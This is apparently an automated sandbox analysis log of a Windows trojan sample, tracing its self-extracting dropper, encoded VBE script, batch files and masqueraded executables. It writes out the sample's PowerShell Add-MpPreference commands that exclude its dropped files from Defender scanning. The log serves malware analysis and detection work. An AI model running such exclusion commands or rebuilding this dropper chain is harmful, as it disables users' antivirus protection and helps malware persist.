                                Source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs QH67JSdZWl.exe
                                Source: agentFont.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: DONEBnCAFZiOynZWpVVmZLvNQeA.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: RuntimeBroker.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.6efd104.1.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.csCryptographic APIs: 'CreateDecryptor'
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@43/52@2/1
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8EFAE3C GetLastError,FormatMessageW,LocalFree,0_2_00007FF7B8EFAE3C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F17EA8 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7B8F17EA8
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\HhjUFBqv.logJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCommand line argument: sfxname1_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCommand line argument: sfxstime1_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCommand line argument: STARTDLG1_2_0073DF1E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCommand line argument: xzw1_2_0073DF1E
                                Source: QH67JSdZWl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: QH67JSdZWl.exeVirustotal: Detection: 44%
                                Source: QH67JSdZWl.exeReversingLabs: Detection: 60%
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile read: C:\Users\user\Desktop\QH67JSdZWl.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\QH67JSdZWl.exe "C:\Users\user\Desktop\QH67JSdZWl.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe"
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll/agentFont.exe"
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\mshypercomponentSavesdll\agentFont.exe C:\mshypercomponentSavesdll\agentFont.exe
                                Source: unknownProcess created: C:\mshypercomponentSavesdll\agentFont.exe C:\mshypercomponentSavesdll\agentFont.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: unknownProcess created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: unknownProcess created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll\agentFont.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll/agentFont.exe"Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll\agentFont.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
